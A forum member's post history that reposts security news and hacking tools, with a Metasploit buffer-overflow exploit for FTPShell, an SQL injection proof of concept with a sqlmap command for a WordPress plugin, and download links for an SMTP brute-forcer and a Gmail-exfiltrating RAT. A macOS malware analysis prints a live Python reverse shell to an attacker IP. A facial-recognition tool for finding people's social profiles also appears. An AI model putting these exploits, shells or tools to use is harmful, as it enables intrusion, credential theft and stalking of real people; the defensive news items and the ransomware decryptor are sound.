Jump to content

OKQL

Active Members
  • Content count

    2642
  • Joined

  • Last visited

  • Days Won

    68

Everything posted by OKQL

  1. Autor: Ar3s Content: connection_fix.reg log-valid.txt SMTP-Error-Log.txt ip.txt SmtpBruter.exe test1 keys.txt wordlist.txt Virustotal Rulati in masina virtuala Download: http://uppit.com/uod04irry320/SMTP_BRUTER.RAR Necesita .NET Framework 4 ...
  2. Security researchers at Microsoft have unveiled details of two critical and important zero-day vulnerabilities that had recently been discovered after someone uploaded a malicious PDF file to VirusTotal, and get patched before being used in the wild. In late March, researchers at ESET found a malicious PDF file on VirusTotal, which they shared with the security team at Microsoft "as a potential exploit for an unknown Windows kernel vulnerability." After analyzing the malicious PDF file, the Microsoft team found that the same file includes two different zero-day exploits—one for Adobe Acrobat and Reader, and the other targeting Microsoft Windows. Since the patches for both the vulnerabilities were released in the second week of May, Microsoft released details of both the vulnerabilities today, after giving users enough time to update their vulnerable operating systems and Adobe software. According to the researchers, the malicious PDF including both the zero-days exploit was in the early development stage, "given the fact that the PDF itself did not deliver a malicious payload and appeared to be proof-of-concept (PoC) code." It seems someone who could have combined both the zero-days to build an extremely powerful cyber weapon had unintentionally and mistakenly lost the game by uploading his/her under-development exploit to VirusTotal. The zero-day vulnerabilities in question are a remote code execution flaw in Adobe Acrobat and Reader (CVE-2018-4990) and a privilege escalation bug in Microsoft Windows (CVE-2018-8120). Leveraging shellcode execution from the first vulnerability, the attacker uses the second Windows kernel exploit to break the Adobe Reader sandbox and run it with elevated privileges. Since this malicious PDF sample was under development at the time of detection, it apparently included a simple PoC payload that dropped an empty vbs file in the Startup folder. Microsoft and Adobe have since released corresponding security updates for both the vulnerabilities in May. For more technical details of the exploits, you can head on to Microsoft and ESET blogs. Via thehackernews.com
  3. Early today, Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS 'InfoSec Handlers Diary Blog'. Titled "Crypto community target of MacOS malware" he noted: His great writeup notes the initial infection vector and provides an overview of the malware, including its method of persistence (launch daemon) and purpose (reverse shell). Here, we dive in a touch deeper into the malware and illustrate how Objective-See's tools can generically thwart this new threat, at every step of the way! OSX.Dummy Remco Verhoef states the malware attacks are: Apparently attackers are asking users to infect themselves, via the following command: $ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script If users fall for this (rather lame social engineering trick, a rather massive machO binary will be downloaded and executed. Massive you say? Yes, it clocks in at 34M: $ du -h /tmp/script 34M script Using WhatsYourSign, we can see that the malicious binary is not signed: Normally such a binary would be blocked by GateKeeper. However if users are downloading and running a binary directly via terminal commands, GateKeeper does not come into play and thus unsigned binary will be allowed to execute. Does this count as a GateKeeper bypass? Maybe? ...I guess the take away here is (yet again) the builtin macOS malware mitigations should never be viewed as a panacea. Unfortunately this binary remains 100% undetected (0/60) all AV engines on VirusTotal: Moving on, if we open the binary in Hopper, the reason for it's size is clear. Various libraries such as OpenSSL and V8 appear to be statically compiled in: Since it's a) Friday PM and b) this binary is massive, filled with all sorts of library code, we're going to skip static analysis and hop right into dynamic analysis. In a High Sierra virtual machine (vm) with various Objective-See tools installed, we execute the malware in order to dynamically observe its actions. Via the ProcInfo process monitor, it's easy to passively see exactly that malware is up to! First, the malware sets script to be owned as root: # procInfo monitoring for process events... process start: pid: 432 path: /usr/bin/sudo args: ( "/usr/bin/sudo", "-S", "-p", "#node-sudo-passwd#", chown, root, "/tmp/script.sh" ) As the malware executes sudo to change the file's permissions to root, this will require the user enter their password in the terminal. This is saved by the malware to /tmp/dumpdummy: # sudo fs_usage -w -f filesystem open /tmp/dumpdummy script.5354 pwrite F=19 script.5354 close F=19 script.5354 # cat /tmp/dumpdummy hunter2 The malware then sets the script to be executable via chmod +x: # procInfo monitoring for process events... process start: path: /usr/bin/sudo user: 501 args: ( "/usr/bin/sudo", "-S", "-p", "#node-sudo-passwd#", chmod, "+x", "/tmp/script.sh" ) Following this, the malware continues by: moving the script into /var/root mv "/tmp/script.sh" "/var/root/" dumping a plist file to /tmp/com.startup.plist and then moving into the LaunchDaemons directory mv "/tmp/com.startup.plist" "/Library/LaunchDaemons/ setting the owner of the com.startup.plist plist to root chown root "/Library/LaunchDaemons/com.startup.plist" launching the com.startup.plist launch daemon launchctl load "-w" "/Library/LaunchDaemons/com.startup.plist" At this point the malware has persisted a malicious launch daemon. This is kindly noted by BlockBlock which detects and alerts on this persistence attempt: As noted in the BlocKBlock alert, the path to the launch daemon plist is /Library/LaunchDaemons/com.startup.plist. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>KeepAlive</key> <true/> <key>Label</key> <string>com.startup</string> <key>Program</key> <string>/var/root/script.sh</string> <key>RunAtLoad</key> <true/> </dict> </plist> As the RunAtLoad key is set to true the value of the Program key, /var/root/script.sh, will be automatically executed by the OS whenever the system is rebooted. Let's look at the script.sh file: #!/bin/bash while : do python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);' sleep 5 done Ah a python script! As noted by Remco Verhoef (@remco_verhoef) in his writeup, this will attempt to connect to 185.243.115.230 on port 1337. It then duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it's setting up an interactive reverse shell. If you have a firewall product installed, such as Objective-See's LuLu, this network activity will be detected: If the connection to the attacker's C&C server (185.243.115.230:1337) succeeds, the attacker will be able to arbitrarily execute commands (as root!) on the infected system. Conclusion Today we analyzed a new piece of mac malware. I'm calling it OSX.Dummy as: the infection method is dumb the massive size of the binary is dumb the persistence mechanism is lame (and thus also dumb) the capabilities are rather limited (and thus rather dumb) it's trivial to detect at every step (that dumb) ...and finally, the malware saves the user's password to dumpdummy To check if you're infected run KnockKnock as root (since the malware set's it components to be readable only by root). Look for an unsigned launch item com.startup.plist executing something named 'script.sh': One can also look for an instance of python running running as root, with the aforementioned reverse shell commands: $ ps aux | grep -i python root python -c import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); Source: objective-see.com
  4. macOS-Fortress macOS-Fortress: Firewall, Blackhole, and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers Kernel-level, OS-level, and client-level security for macOS. Built to address a steady stream of attacks visible on snort and server logs, as well as blocks ads, malicious scripts, and conceal information used to track you around the web. After this package was installed, snort and other detections have fallen to a fraction with a few simple blocking actions. This setup is a lot more capable and effective than using a simple adblocking browser add-on. There's a world of difference between ad-filled web pages with and without a filtering proxy server. It's also saved me from inadvertantly clicking on phishing links. Proxy features macOS adaptive firewall Adaptive firewall to brute force attacks IP blocks updated about twice a day from emergingthreats.net (IP blocks, compromised hosts, Malvertisers) and dshield.org’s top-20 Host blocks updated about twice a day from hphosts.net EasyList Tracker and Adblock Rules to Proxy Auto Configuration (PAC) proxy.pac file and Privoxy Actions and Filters Uses easylist-pac-privoxy and adblock2privoxy to easily incorporate multiple blocking rulesets into both PAC and Privoxy formats, including easyprivacy.txt, easylist.txt, fanboy-annoyance.txt, fanboy-social.txt, antiadblockfilters.txt, malwaredomains_full.txt, and the anti-spamware list adblock-list.txt. The install script readme-and-install.sh installs and configures an macOS Firewall and Privatizing Proxy. It will: Prompt you to install Apple's Xcode Command Line Tools and Macports Uses Macports to download and install several key utilities and applications (wget gnupg p7zip squid privoxy nmap) Configure macOS's PF native firewall (man pfctl, man pf.conf), squid, and privoxy Turn on macOS's native Apache webserver to serve the Automatic proxy configuration http://localhost/proxy.pac Networking on the local computer can be set up to use this Automatic Proxy Configuration without breaking App Store or other updates (see squid.conf) Uncomment the nat directive in pf.conf if you wish to set up an OpenVPN server Install and launch daemons that download and regularly update open source IP and host blacklists. The sources are emergingthreats.net (net.emergingthreats.blockips.plist), dshield.org (net.dshield.block.plist), hosts-file.net (net.hphosts.hosts.plist), and EasyList (com.github.essandess.easylist-pac.plist, com.github.essandess.adblock2privoxy.plist) Installs a user launch daemon that deletes flash cookies not related to Adobe Flash Player settings every half-hour (http://goo.gl/k4BxuH) After installation the connection between clients and the internet looks this this: Application proxy.pac port 3128Squid port 8118Privoxy Internet An auxilliary nginx-based webserver (nominally on localhost:8119) is used for both a proxy.pac ad and tracker blackhole and for CSS element blocking rules with the Privoxy configuration generated by adblock2privoxy. Public Service Announcement This firewall is configured to block all known tracker and adware content—in the browser, in-app, wherever it finds them. Many websites now offer an additional way to block ads: subscribe to their content. Security and privacy will always necessitate ad blocking, but now that this software has become mainstream with mainstream effects, ad blocker users must consider the potential impact of ad blocking on the writers and publications that are important to them. Personally, two publications that I gladly pay for, especially for their important 2016 US Presidential election coverage, are the New York Times and The Atlantic. I encourage all users to subscribe to their own preferred publications and writers. Tracker blocking Lightbeam, the tracking tracker Firefox add-on, shows how ad- and tracker-blocking works to prevent third parties monitoring you or your children's online activities. My daughter enjoys the learning exercises at the children's website ABCya!. The Lightbeam graph below on the left shows all the third party trackers after less than a minute of browser activity, without using a privatizing proxy. The graph on the right shows all this tracker activity blocked when this privatizing proxy is used. Lightbeam graph without proxy Lightbeam graph with proxy This problem is the subject of Gary Kovacs's TED talk, Tracking Our Online Trackers: Attack blocking The snort intrusion detection system reports far fewer events when known attack sites are blackholed by the packet filter: snort+BASE Overview snort+BASE Events Installation git clone --recurse https://github.com/essandess/macOS-Fortress.git cd macOS-Fortress sudo sh ./readme-and-install.sh Disabling sudo sh ./disable.sh Notes Configure the squid proxy to accept connections on the LAN IP and set LAN device Automatic Proxy Configurations to http://lan_ip/proxy.pac to protect devices on the LAN. Count the number of attacks since boot with the script pf_attacks. ``Attack'' is defined as the number of blocked IPs in PF's bruteforce table plus the number of denied connections from blacklisted IPs in the tables compromised_ips, dshield_block_ip, and emerging_threats. Both squid and Privoxy are configured to forge the User-Agent. The default is an iPad to allow mobile device access. Change this to your local needs if necessary. Whitelist or blacklist specific domain names with the files /usr/local/etc/whitelist.txt and /usr/local/etc/blacklist.txt. After editing these file, use launchctl to unload and load the plist /Library/LaunchDaemons/net.hphosts.hosts.plist, which recreates the hostfile /etc/hosts-hphost and reconfigures the squid proxy to use the updates. Sometimes pf and privoxy do not launch at boot, in spite of the use of the use of their launch daemons. Fix this by hand after boot with the scripts macosfortress_boot_check, or individually using pf_restart, privoxy_restart, and squid_restart. And please post a solution if you find one. All open source updates are done using the wget -N option to save everyone's bandwidth Security These services are intended to be run on a secure LAN behind a router firewall. The default proxy configuration will only accept connections made from the local computer (localhost). If you change this to accept connections from any client on your LAN, do not configure the router to forward ports 3128 or 8118, or you will be running an open web proxy. Source
  5. ███████╗ █████╗ ██████╗ ██╗ ███████╗ ███████╗██╗ ██╗███████╗ ██╔════╝██╔══██╗██╔════╝ ██║ ██╔════╝ ██╔════╝╚██╗ ██╔╝██╔════╝ █████╗ ███████║██║ ███╗██║ █████╗ █████╗ ╚████╔╝ █████╗ ██╔══╝ ██╔══██║██║ ██║██║ ██╔══╝ ██╔══╝ ╚██╔╝ ██╔══╝ ███████╗██║ ██║╚██████╔╝███████╗███████╗ ███████╗ ██║ ███████╗ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚══════╝ ╚══════╝ ╚═╝ ╚══════╝ Jerry Shaw, you have been activated Find your friends Social Media Profiles with ease This only works if their Facebook Profile is public What does this do? In simple words you have at least one Image of the Person you are looking for and a clue about its name. You feed this program with it and it tries to find Instagram, Youtube, Facebook, Twitter Profiles of this Person. How does it work? You give it a name and at least one photo. It then searches Facebook for this name and does Facial Recognition to determine the right Facebook Profile. After that it does a Google and ImageRaider Reverse Image Search to find other Social Media Profiles. If a Instagram Profile was found it will be verified by comparing your known photo of the Person to some of the Instagram Pictures. In the end you get a PDF Report How to use it Automated Prequisites Installation wget https://raw.githubusercontent.com/ThoughtfulDev/EagleEye/master/pre.sh && chmod +x pre.sh && ./pre.sh Manual Prequisites Installation $ sudo apt update && sudo apt upgrade -y $ sudo apt install git python3 python3-pip python3-dev $ sudo apt install libgtk-3-dev libboost-all-dev build-essential cmake libffi-dev $ git clone https://github.com/ThoughtfulDev/EagleEye $ cd EagleEye && sudo pip3 install -r requirements.txt $ sudo pip3 install --upgrade beautifulsoup4 html5lib spry Regardless of which option you choose make sure that you have Firefox installed If you have Firefox installed, download the latest release of the Geckodriver for you Architecture. Note: If you are using Firefox ESR(like Kali does) please use the Geckodriver Version 17 Next change the value in config.json to the path of the geckodriver e.g { "DEFAULTS": { ... }, "WEBDRIVER": { "ENGINE": "firefox", "PATH": "PATH TO geckodriver e.g C:\\Program Files\\geckodriver.exe" }, "FILTER": [ .... ], ... } Make the Geckodriver executable $ chmod +x /path/to/geckodriver I will try to implement the Chrome Webdriver as soon as possible Next put at least one Image of the Person you want to find in the known folder. (Has to be .jpg for now) Then run the program $ python3 eagle-eye.py To see a list of all available Options just type $ python3 eagle-eye.py -h The ImageRaider Reverse Image Search can take some minutes 1-15 Minutes depending on the count of Images Screenshots? Example Report (Used one Image of Emeraude Toubia) Download: EagleEye-master.zip Source
  6. Python based backdoor that uses Gmail to exfiltrate data through attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends it to an attacker as an e-mail attachment. Powershell-RAT Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. This RAT will help someone during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment. Note: This piece of code is Fully UnDetectable (FUD) by Anti-Virus (AV) software. This project must not be used for illegal purposes or for hacking into system where you do not have permission, it is strictly for educational purposes and for people to experiment with. Any suggestions or ideas for this tool are welcome - just tweet me on @ManiarViral Screenshot: On the first run of the Powershell-RAT user will get options as below: Using Hail Mary option to backdoor a Windows machine: Successfully taking screenshots of the user activity: Data exfiltrated as an email attachment using Gmail: Setup: Throwaway Gmail email address Enable "Allow less secure apps" by going to https://myaccount.google.com/lesssecureapps Modify the $username & $password variable for your account in the Mail.ps1 Powershell file Modify $msg.From & $msg.To.Add with throwaway gmail address Download: Powershell-RAT-master.zip Source
  7. This Metasploit module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote code execution. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer def initialize(info = {}) super(update_info(info, 'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote code execution. }, 'Author' => [ 'r4wd3r', # Original exploit author 'Daniel Teixeira' # MSF module author ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2018-7573'], [ 'EDB', '44596' ] ], 'Payload' => { 'Space' => 400, 'BadChars' => "\x00\x22\x0d\x0a\x0b" }, 'Platform' => 'win', 'Targets' => [ # CALL ESI in FTPShell.exe : 0x00452eed [ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ] ], 'Privileged' => false, 'DefaultOptions' => { 'SRVHOST' => '0.0.0.0', 'EXITFUNC' => 'thread' }, 'DisclosureDate' => 'Mar 4 2017', 'DefaultTarget' => 0)) register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ] end def exploit srv_ip_for_client = datastore['SRVHOST'] if srv_ip_for_client == '0.0.0.0' if datastore['LHOST'] srv_ip_for_client = datastore['LHOST'] else srv_ip_for_client = Rex::Socket.source_address('50.50.50.50') end end srv_port = datastore['SRVPORT'] print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}") super end def on_client_connect(client) p = regenerate_payload(client) return if p.nil? print_status("#{client.peerhost} - connected.") res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") unless res.empty? print_status("#{client.peerhost} - Response: Sending 220 Welcome") welcome = "220 Welcome.\r\n" client.put(welcome) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") print_status("#{client.peerhost} - Response: sending 331 OK") user = "331 OK.\r\n" client.put(user) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") print_status("#{client.peerhost} - Response: Sending 230 OK") pass = "230 OK.\r\n" client.put(pass) res = client.get_once.to_s.strip print_status("#{client.peerhost} - Request: #{res}") sploit = '220 "' sploit << payload.encoded sploit << "\x20" * (payload_space - payload.encoded.length) sploit << target.ret sploit << "\" is current directory\r\n" print_status("#{client.peerhost} - Request: Sending the malicious response") client.put(sploit) end end Source
  8. OKQL

    ThanatosDecryptor

    ThanatosDecryptor is an executable program that attempts to decrypt certain files encrypted by the Thanatos malware. File types currently supported include: Image: .gif, .tif, .tiff, .jpg, .jpeg, .png Video: .mpg, .mpeg, .mp4, .avi Audio: .wav Document: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .odt, .ods, .odp, .rtf Other: .zip, .7z, .vmdk, .psd, .lnk In order to decrypt files as quickly as possible, ThanatosDecryptor should be run on the original machine infected with the malware, and against the original .THANATOS files that it created. ThanatosDecryptor has been tested against versions 1 and 1.1 of the malware. Known malware sample hashes include: 55aa55229ea26121048b8c5f63a8b6921f134d425fba1eabd754281ca6466b70 97d4145285c80d757229228d13897820d0dc79ab7aa3624f40310098c167ae7e 8df0cb230eeb16ffa70c984ece6b7445a5e2287a55d24e72796e63d96fc5d401 bad7b8d2086ac934c01d3d59af4d70450b0c08a24bc384ec61f40e25b7fbfeb5 02b9e3f24c84fdb8ab67985400056e436b18e5f946549ef534a364dff4a84085 fe1eafb8e31a84c14ad5638d5fd15ab18505efe4f1becaa36eb0c1d75cd1d5a9 Thanatos Overview When run, the Thanatos malware looks for files recursively in the following directories: Desktop Documents Downloads Favourites Music OneDrive Pictures Videos For each file found, the malware derives an encryption key from the number of milliseconds that the infected computer has been running (via a call to GetTickCount), encrypts the file using 256-bit AES encryption, and then discards the encryption key. It would be practically impossible to brute-force guess the 256-bit AES encryption key directly, but since the malware derives this key from the system uptime (a 32-bit value) the key is effectively 32-bits in length. On the virtual machine that I tested on, around 100,000 key derivations and AES decryption operations (on one AES block worth of data, needed for decryption success verification) could be performed every second, meaning in the worst case it would take around 12 hours to successfully guess the key if the system uptime value was random. The system uptime is not random, though. The maximum number of milliseconds you can store in a 32-bit value comes out to be 49.7 days worth, and many people tend to shutdown or hibernate their computers before then (or let them sleep from time to time). Thus, the system uptime at time of infection is likely to be a fairly low value - starting at 0 and guessing your way up is a decent approach. A further optimization is enabled by the fact that the system uptime is written to the Windows Event Logs around once per day. Also, the malware does not modify the .THANATOS file creation dates, so with this information the search space can be reduced to approx. the number of milliseconds within the 24 hours before infection. At 100k attempts per second, it would take around 14 minutes to guess the key under these conditions. ThanatosDecryptor Operation When run, ThanatosDecryptor first searches the directories listed above for files with the .THANATOS file extension. Once found, the original file extension (which is preserved by the malware in the file name write before .THANATOS) is compared with the list of file types supported by ThanatosDecryptor. If the file type is one supported, the file gets queued for decryption. ThanatosDecryptor also parses the Windows Event Log for the daily uptime messages and uses the encrypted file time metadata to determine a starting value for decryption. This value is used to derive an encryption key, an AES decryption operation is done against the file contents, and the resulting byte are compared against values known to be at the beginning of those file types. If the comparison is unsuccessful, increments the seed and tries this process again. Otherwise, the file is decrypted and written out with the original file name. Finally, once one file has been successfully encrypted, ThanatosDecryptor uses the SEED value from that decryption attempt as a starting point for decryption attempts against follow-on files (since they are all likely to be very similar). Running the Program Download the latest ThanatosDecryptor.exe file from the Release directory and run it on the infected system as the user that had his/her files encrypted. Building Visual Studios is required for building. Visual Studio 2017 Community Edition works for me! To build ThanatosDecryptor from source, clone this repo, cd into the ThanatosDecryptor directory, and from the 'Developer Command Prompt for VS 2017' that ships with Visual Studio 2017, run the following command: msbuild ThanatosDecryptor.vcxproj /p:Configuration=Release /p:Platform=Win32 It's easiest to find the Developer Command Prompt using the Windows Start Menu search box. Example output Found the following files able to be decrypted: C:\Users\zelda\Desktop\testfiles\test.7z.THANATOS C:\Users\zelda\Desktop\testfiles\Test.doc.THANATOS C:\Users\zelda\Desktop\testfiles\Test.docx.THANATOS C:\Users\zelda\Desktop\testfiles\test.gif.lnk.THANATOS [...] C:\Users\zelda\Desktop\testfiles\test.xlsx.THANATOS C:\Users\zelda\Desktop\testfiles\test.zip.THANATOS Beginning decryption attempt Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.7z.THANATOS Tried 393288 seed values thus far Successful decryption verification! Seed: 516031 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.7z Attempting to decrypt C:\Users\zelda\Desktop\testfiles\Test.doc.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031 Tried 8257 seed values thus far Successful decryption verification! Seed: 516031 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\Test.doc Attempting to decrypt C:\Users\zelda\Desktop\testfiles\Test.docx.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031 Tried 8257 seed values thus far Successful decryption verification! Seed: 516031 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\Test.docx Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.gif.lnk.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516031 Tried 8257 seed values thus far Successful decryption verification! Seed: 516046 Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.gif.lnk Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.gif.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516046 [...] Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.xlsx.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516062 Tried 8226 seed values thus far Successful decryption verification! Seed: 8ca3e Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.xlsx Attempting to decrypt C:\Users\zelda\Desktop\testfiles\test.zip.THANATOS Overriding calculated SEED value for previously successful SEED value (minus 60 secs): 516062 Tried 8226 seed values thus far Successful decryption verification! Seed: 8ca3e Successfully wrote decrypted file to: C:\Users\zelda\Desktop\testfiles\test.zip Press any key to exit Note how some files were encrypted using the same Seed value - according to the GetTickCount man page, the uptime has a resolution of between 10ms and 16ms, which means that it can take between 10-16 ms for another call to GetTickCount to return a different value. Download: ThanatosDecryptor-master.zip (1.8MB) Source
  9. The Wi-Fi Alliance today officially launched WPA3—the next-generation Wi-Fi security standard that promises to eliminate all the known security vulnerabilities and wireless attacks that are up today including the dangerous KRACK attacks. WPA, or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced Encryption Standard (AES) protocol and is intended to prevent hackers from eavesdropping on your wireless data. However, in late last year, security researchers uncovered a severe flaw in the current WPA2 protocol, dubbed KRACK (Key Reinstallation Attack), that made it possible for attackers to intercept, decrypt and even manipulate WiFi network traffic. Although most device manufacturers patched their devices against KRACK attacks, the WiFi Alliance, without much delay, rushed to finalize and launch WPA3 in order to address WPA2's technical shortcomings from the ground. What is WPA3? What New Security Features WPA3 Offers? WPA3 security standard will replace the existing WPA2 that has been around for at least 15 years and widely used by billions of devices every day. The new security protocol provides some big improvements for Wi-Fi enabled devices in terms of configuration, authentication, and encryption enhancements, making it harder for hackers to hack your Wi-Fi or eavesdrop on your network. On Monday, the Wi-Fi Alliance launched two flavors of latest security protocol—WPA3-Personal and WPA3-Enterprise—for personal, enterprise, and IoT wireless networks. Here are some key features provided by the new protocol: 1.) Protection Against Brute-Force Attacks WPA3 provides enhanced protection against offline brute-force dictionary attacks, making it harder for hackers to crack your WiFi password—even if you choose less complex passwords—by using commonly used passwords over and over again. 2.) WPA3 Forward Secrecy WPA3 leverages SAE (Simultaneous Authentication of Equals) handshake to offer forward secrecy, a security feature that prevents attackers from decrypting old captured traffic even if they ever learn the password of a network. 3.) Protecting Public/Open Wi-Fi Networks WPA3 strengthens user privacy in open networks through individualized data encryption, a feature that encrypts the wireless traffic between your device and the Wi-Fi access point to mitigate the risk of Man-in-the-Middle (MitM) attacks. To prevent such passive attacks, WPA3 could add support for Opportunistic Wireless Encryption (OWE). 4.) Strong Encryption for Critical Networks Using WPA3 Enterprise, critical Wi-Fi networks handling sensitive information (such as government, , and industrial organizations), can protect their Wi-Fi connections with 192-bit encryption. Wi-Fi Easy Connect Alongside WPA3, the WiFi Alliance has also announced a new feature, called Wi-Fi Easy Connect, that simplifies the process of pairing smart home gadgets (without any screen or display) to your router. Wi-Fi Easy Connect is a replacement for Wi-Fi Protected Setup (WPS), which has been considered insecure. With the support for Easy Connect, you will be able to pair your smart gadget with the router by simply scanning a QR code with your smartphone to have the Wi-Fi credentials automatically sent to the new smart device. It should be noted that both WPA3 and Wi-Fi Easy Connect will not hit the mainstream right away. In fact, it is going to be a many-years-long process that will require new routers and smart gadgets to support WPA3. Therefore, WPA2 will not stop working any time soon, and devices with WPA3 support will still be able to connect with devices that use WPA2 for the working of your gadgets, but WPA3 support will eventually become mandatory as adoption grows. WPA3 is set to roll out later this year and is expected to hit mass adoption in late 2019, when it eventually become a requirement for devices to be considered Wi-Fi certified, according to the WiFi Alliance. Via thehackernews.com
  10. Project Cerium : Antivirus Open Source Antivirus For Humans How to Use clone the repo : git clone https://github.com/xedtech/ceriumav.git cd ceriumav python3 av.py Screenshots Source
  11. OKQL

    Project Cerium : Antivirus

    ba da, doar ca nici unul din top nu mi-a detectat niste rootkit-uri scrise de independent parca...
  12. OKQL

    Project Cerium : Antivirus

    restul care? am cautat ceva serios zilele trecute si nimic
  13. WordPress iThemes Security plugin versions prior to 7.0.3 suffer from a remote SQL injection vulnerability. # Exploit Title: WordPress Plugin iThemes Security(better-wp-security) <= 7.0.2 - Authenticated SQL Injection # Date: 2018-06-25 # Exploit Author: Alirim Emini # Website: https://www.sentry.co.com/ # Vendor Homepage: https://ithemes.com/ # Software Link: https://wordpress.org/plugins/better-wp-security/ # Version/s: 7.0.2 and below # Patched Version: 7.0.3 # CVE : 2018-12636 # WPVULNDB: https://wpvulndb.com/vulnerabilities/9099 Plugin description: iThemes Security works to lock down WordPress, fix common holes, stop automated attacks and strengthen user credentials. With advanced features for experienced users, this WordPress security plugin can help harden WordPress. Description: WordPress Plugin iThemes Security(better-wp-security) before 7.0.3 allows remote authenticated users to execute arbitrary SQL commands via the 'orderby' parameter in the 'itsec-logs' page to wp-admin/admin.php. Technical details: Parameter orderby is vulnerable because backend variable $sort_by_column is not escaped. File: better-wp-security/core/admin-pages/logs-list-table.php Line 271: if ( isset( $_GET[' orderby '], $_GET['order'] ) ) { Line 272: $ sort_by_column = $_GET[' orderby ']; File: better-wp-security/core/lib/log-util.php Line 168: $query .= ' ORDER BY ' . implode( ', ', $ sort_by_column )); Proof of Concept (PoC): The following GET request will cause the SQL query to execute and sleep for 10 seconds if clicked on as an authenticated admin: http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip%2c(select*from(select(sleep(10)))a)&order=asc&paged=0 Using SQLMAP: sqlmap -u 'http://localhost/wp-admin/admin.php?page=itsec-logs&filter=malware&orderby=remote_ip*&order=asc&paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --technique T --level 5 --risk 3 https://packetstormsecurity.com/files/148294/WordPress-iThemes-Security-SQL-Injection.html
  14. OKQL

    Decompilare aplicatie Android

    jadx-gui --show-bad-code 1.app.apk
  15. Deep Exploit at Black Hat USA 2018 Arsenal. Overview DeepExploit is fully automated penetration tool linked with Metasploit. It has two exploitation modes. Intelligence mode DeepExploit identifies the status of all opened ports on the target server and executes the exploit at pinpoint using Machine Learning. Brute force mode DeepExploit executes exploits thoroughly using all combinations of "Exploit module", "Target" and "Payload" of Metasploit corresponding to user's indicated product name and port number. DeepExploit's key features are following. Self-learning. DeepExploit can learn how to exploitation by itself (uses reinforcement learning). It is not necessary for humans to prepare learning data. Efficiently execute exploit. DeepExploit can execute exploits at pinpoint (minimum 1 attempt) using self-learned data. Deep penetration. If DeepExploit succeeds the exploit to the target server, it further executes the exploit to other internal servers. Operation is very easy. Your only operation is to input one command. It is very easy!! Learning time is very fast. Generally, learning takes a lot of time. So, DeepExploit uses distributed learning by multi agents. We adopted an advanced machine learning model called A3C. Abilities of "Deep Exploit" Current DeepExploit's version is a beta. But, it can fully automatically execute following actions: Intelligence gathering. Threat modeling. Vulnerability analysis. Exploitation. Post-Exploitation. Reporting. Your benefits By using our DeepExploit, you will benefit from the following. For pentester: (a) They can greatly improve the test efficiency. (b) The more pentester uses DeepExploit, DeepExploit learns how to method of exploitation using machine learning. As a result, accuracy of test can be improve. For Information Security Officer: (c) They can quickly identify vulnerabilities of own servers. As a result, prevent that attackers attack to your servers using vulnerabilities, and protect your reputation by avoiding the negative media coverage after breach. Since attack methods to servers are evolving day by day, there is no guarantee that yesterday's security countermeasures are safety today. It is necessary to quickly find vulnerabilities and take countermeasures. Our DeepExploit will contribute greatly to keep your safety. System component DeepExploit consists of the machine learning model (A3C) and Metasploit. The A3C executes exploit to the target servers via RPC API. The A3C is developped by Keras and Tensorflow that famous ML framework based on Python. It is used to self-learn exploit's way using deep reinforcement learning. The self-learned's result is stored to learned data that reusable. Metasploit is most famous penetration test tool in the world. It is used to execute an exploit to the target servers based on instructions from the A3C. Processing flow Intelligence mode Step 1. Port scan the training servers. DeepExploit gathers information such as OS, opened port number, product name, protocol on the target server. So, it executes the port scanning to training servers. After port scanning, it executes two Metasploit's command (hosts and services) via RPC API. ex) The 